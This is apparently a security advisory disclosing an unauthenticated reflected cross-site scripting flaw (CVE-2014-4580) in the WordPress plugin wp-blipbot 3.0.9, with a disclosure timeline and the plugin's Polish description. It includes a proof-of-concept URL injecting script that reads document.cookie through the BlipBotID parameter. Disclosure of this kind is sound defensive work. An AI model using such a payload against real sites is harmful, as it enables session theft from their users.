wp-plugin : wp-blipbot – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : wp-blipbot

 

Effected Version : 3.0.9 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 
http://localhost/wp-content/plugins/wp-blipbot/blipbot.ajax.php?ObrazkiID=ObrazkiID&BlipBotID=BlipBotID">alert(document.cookie)&

Vulnerable Parameter : BlipBotID

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-17

 
Plugin Status : Updated
 
Public Disclosure : June 12, 2014
 
CVE Number : CVE-2014-4580

 
Plugin Description :
 
Wtyczka **WP BlipBot** pozwala wysyłać do serwisu [Blip.pl](http://blip.pl/) informacje o publikowanych przez autora bloga postach. Wszelkie uwagi można zgłaszać na **Blipie** tagując wiadomości [#WP-BlipBot](http://www.blip.pl/tags/wpblipbot/), lub bezpośrednio do mnie [lukaszwiecek](http://www.blip.pl/users/lukaszwiecek/dashboard/).

Histora zmian dostępna jest [tutaj](http://wordpress.org/extend/plugins/wp-blipbot/other_notes/).

**Wymagania!**

Do poprawnego działania wtyczka wymaga dostępu do biblioteki **cURL** oraz serwera **PHP w wersji 5.2.0** lub wyższej.

Leave a Reply

Your email address will not be published. Required fields are marked *